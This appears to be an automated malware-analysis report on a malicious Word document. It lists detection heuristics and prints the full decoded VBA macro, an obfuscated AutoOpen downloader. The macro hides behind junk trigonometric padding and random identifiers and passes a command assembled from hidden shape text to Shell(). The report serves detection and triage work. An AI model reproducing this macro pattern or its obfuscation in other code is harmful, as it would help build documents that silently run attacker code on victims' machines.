MALICIOUS
Risk Score: 252
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample contains a VBA macro with an autoopen subroutine that invokes cmd.exe with obfuscated arguments. This suggests an attempt to download and execute a secondary payload. The presence of a Shell() call and suspicious cmd.exe invocation points to a malicious downloader.
Heuristics (9)
- ClamAV: Doc.Malware.Dldk-6779378-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dldk-6779378-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script:
  . _ Shell(TuVsYWzGVb, mBazcr), jiqpK) FznbikbSkGiwYhaFEmIlJw = JThRwjNCcTJEwtXijWNiC / Tan(197755194) * 272893850 / Tan(302319952) + pHZOrJfISiIBTdl - Cos(152461652) + (25668951 / Int(cOddMjDcPvOffd))
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Attribute VB_Customizable = True Sub autoopen() pjbmZm
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5467 bytes |

SHA-256: 01abdc3ae30b8c53713174f73c90f89fa625a6d995064acbf4532e1551747706
Detection (ClamAV): No threats found
Obfuscation or payload: likely. 142 of 181 identifiers look randomly generated (e.g. 'risziEmwEdpWGcMlVGowvorv'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "sCJtiKrzIX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
pjbmZm
End Sub
Attribute VB_Name = "cXQwOdwwjbnIMD"
Function pjbmZm()
On Error Resume Next
UaOKwSDtNXWcmPinKlhHdR = sRhnkkYbqhXnWbGioDIHcWEr / Tan(189679605) * 38879204 / Tan(121208645) + fvoJDiWtRfTIpw - Cos(210039272) + (306837440 / Int(cHMECtDVJTWMqKiST))
Set vtOjrFNQJkzSfqKczzGAcBkn = KzhbUoqVAkBAtPGrlkSVqnf
NKjMTTtIaphFfp = wJzfFIcGhzIqRRRDWTfOKH
FLOumcGJRqENCRRXOKVRihw = KciAzNNjHvDawrOw / Tan(155682666) * 206048898 / Tan(89998048) + tBOklbkmYDMXODj - Cos(61838601) + (303240094 / Int(JEcUGGOqbWwXuDT))
Set QJOwOXcbLEifMtIFERVJdZv = WuANpBJJEXmauvs
bAJBYjihOrSdhKNrNHbTXO = JvYboGiKIYjicPujnPSzw
JuHtsDKsrtXzSzcOsROjFRR = flwdfJzMLMwCECpfqPIWK / Tan(320210200) * 80341525 / Tan(331692690) + wrOdGpsdaNHGhNhtKlFw - Cos(170558094) + (65780704 / Int(biqpIvWjYwAjRljFWGZipi))
Set ICbczKGzDmBmuPAjiDi = IjdQIbjjsAfAtJhmhSXYS
zwPzopWWqbLAQcYKUXiXHCGA = khOCPfFPKjhAJnqMWJEpttF
kIoNVLnPFkFCnDG = jHnJPtQlEzZHAFGj / Tan(61905209) * 300175983 / Tan(175003799) + DOiUdQGjOlEhzXBwOZtrsCI - Cos(144444533) + (252237224 / Int(OziWttdPJScTjwmjXSvs))
Set cEJUjAjwAFIhwCGE = sKEiOjTutuEMfpauXlvUBJt
QIMTljwjbiaknbOUqZqFfmV = inZQLkriRKRGXzIJw
CtiKEJCFSfCRTuzaOvvFsbj = CzVqvJsUfAikcOlZIozrWnmH / Tan(11659955) * 168072936 / Tan(27189649) + LbAaKkIEoMKJmimSMPzzJWz - Cos(26988345) + (200581333 / Int(bPMNoVFwJEAIZrGhkvioEoB))
Set vlbEkodwvSJsraYoDo = hREqFtclCZqnmOtSCtB
UaEMGiNpKWqkQPTB = vWKIDaWFfWiwIWuCbEHNrjX
HjkILwwZfmXhMjCbuZNkoE = HSLwiUlZXTXEIOEmfXDPBca / Tan(260357123) * 5005420 / Tan(32187363) + UzzlwCmdpAzOEuN - Cos(334850) + (98074211 / Int(iuNqmhMlprirYzdOQbZhYB))
Set kOmjJwVncLzWKrdLQZ = NuwzbBkqdlahPcZc
zBCnTECfZbTWmQJHLoa = QLiZIrCBijukPBLOXatqwS
StOjVJzcYqCaMOKJWEi = XMfoIiNvVEnSPEt / Tan(186443041) * 56803514 / Tan(51823574) + KYlrwjEMcJHAXzLBGNZX - Cos(286734865) + (318102284 / Int(GUCjLIViBOZTim))
Set hIERllNDQTECnOikmO = iXvwsEHbGlzjdPljRS
LQsRmQHFiTSinFLHzlL = MdKGRSnanChRRMCF
fOlLKzVzzGpCEhtV = vkYLmwUahzcDUqMQXmRApB / Tan(178708063) * 216696216 / Tan(44355982) + lldVjLhdNXowtSRldz - Cos(297872966) + (313384101 / Int(PdlhucUwuJrEPLizLSQW))
Set cocYtwjEXbnLrVIromjMfT = zudHjnSjcYomoJIB
luWhDtYpZFXjhKLJaiiP = zQFuLmCiThflFbkzjuAERJh
Set QTqVRZE = sCJtiKrzIX.Shapes(zqLoWcic + "qjuljvLMNkR" + ABphi).TextFrame
hPzDGQOVDbiwIF = FabpETukIAJlapKoYXmkA / Tan(29916536) * 7034727 / Tan(20648151) + zaoBHWkIIMmwJpkm - Cos(208508364) + (273558546 / Int(zfojsnFZWVkAZY))
Set FsGiAiYdRcXpPhBzUOwF = LuvOBzNmXMMafksfwpXZ
XDVzqrVXQlaTzt = LUwhKqtQKPjwJRXZbffnrZQL
VQwKbwiviBqocuthvMb = uQMPLMWYbqbaFqTfTDQl / Tan(187879928) * 67597035 / Tan(218989918) + wfQUGjlEsMjEEhwOaK - Cos(128845655) + (291650313 / Int(PjmbONsvqBkjqRjwBRv))
Set WitJPbmEBKRqovi = dtrSsICKwUNPSSYsXnDhpdMn
nufjtuuikSIZdMOfjNu = WljlZTBsAGAhErFO
wAkPimDDdRbhRw = jpwHTptwEzfOwa / Tan(163893644) * 29111877 / Tan(11217345) + wjciLqzEvfqjncrzC - Cos(204494982) + (49559982 / Int(HMECfSwYFdEMZPSOb))
Set iHHPuOIVJDWwXtwjKlfaDtra = SadKYJcXEAzKrSqtKIvBGFKQ
EjjAvkQjQcnfKltubTszZS = phslwZsMQNUTdsWJQj
TuVsYWzGVb = QTqVRZE.ContainingRange + znRGG + crpOKd + iGvMF + HalGiq + mcSbl + IAFPzv + RUKEPhE + JPPmSQk + YENvisz + FpzIzdN + vBVWhSmS
SDoOtQfqBTHiMW = kjWdzMGrmkvILqVoowEzSikr / Tan(37968811) * 274778523 / Tan(208410044) + HrKoohKLrFzsMMBdwHTzffT - Cos(224157839) + (53440172 / Int(dBvfXJjNjuaGTijJwiz))
Set lGjGtwWjNcYcjPDI = LhpLzcGDrnpTWikkw
WUpmZnAzGVwaEaXtkAHAmi = CBKjMquorkcjnaYICLz
sonuvXqIDwbHVLImrXGOkG = AnoWuQbsBBFrfXwKRwAlwJ / Tan(130654799) * 318940529 / Tan(36883308) + JOrhLDmznGGBvrb - Cos(42667981) + (167758932 / Int(PUdOtNpSjUqqTsQ))
Set HNBUqBEfkrDQAIJskOjkcv = irtTRJwnOkHkOFFPOQ
iBJZRbLzGFLfMMrXcwhmWnEp = tYumiwSUiQTUScsFLphC
ItNcwfTzrwPsahUYBtG = bIUdUCDlOwsKkvijkYZ / Tan(163408844) * 225888682 / Tan(211396052) + univREjovunzAZkHwciktEF - Cos(52193143) + (206182777 / Int(ondThrvOZpmGlj))
Set KwQwvdGAQdwzvApiaPNQs = bMvEmzuUprBCjHoL
ahmMqlrzOkGMqXQpzVEAq = GGvnFwsQitPjniGzkbDFXPn
Const mBazcr = 0
NaLojEihBHNGPkOdNuh = QGEsWfaJVCimoudrcBB / Tan(56101338) * 3696776 / Tan(340086287) + BrhpWLDTAcVJHWSREdUMwZa - Cos(121351399) + (138964236 / Int(WAMtYbQMCBpqDwR))
Set hKSkVVJjwifnvbQOUPpCH = EusvTRcOaWuPrQA
lArdwuvdQakaWoJPcaGYs = BsHiDJsjkAOjdoLdKJw
NIzTMiuCvpFcsbpBOBOPql = WZqXrXuYusiqpScNz / Tan(8071505) * 41931194 / Tan(110243293) + loDmDRbldCzbsauVG - Cos(20495157) + (200586655 / Int(QKkNkzjloPOjUz))
Set kmlnGSnRpfOzrhsswbPza = pBEiqzOoPHtpKjV
YjdtuiVBsDwWQIFAL = zjjYcqCAQHEBXJXiDjVj
fCpmB = Array(YHBtifllf, GmquROzqj, whEZiiVp, Interaction _
. _
Shell(TuVsYWzGVb, mBazcr), jiqpK)
FznbikbSkGiwYhaFEmIlJw = JThRwjNCcTJEwtXijWNiC / Tan(197755194) * 272893850 / Tan(302319952) + pHZOrJfISiIBTdl - Cos(152461652) + (25668951 / Int(cOddMjDcPvOffd))
Set KIZnokKiviPPhMscKwcMfd = vtKOuktnziOIUMjP
SkhzwRVPWTDjCRHhz = udWQuCrPlTEYPbiKuvvM
sFQERumnZMNHEqtqm = WzYJMTWNIpjwWq / Tan(12220826) * 185269109 / Tan(199253618) + VjOYCjSQwdPhTlO - Cos(196934794) + (101243300 / Int(risziEmwEdpWGcMlVGowvorv))
Set tzaVzhsbDkvOYzKlFf = acXnVhQIpQCDrzcpGMbGvz
CrQXzIiNqJCUrVJEojZDKAj = RvIDZiYtdhUvFKT
End Function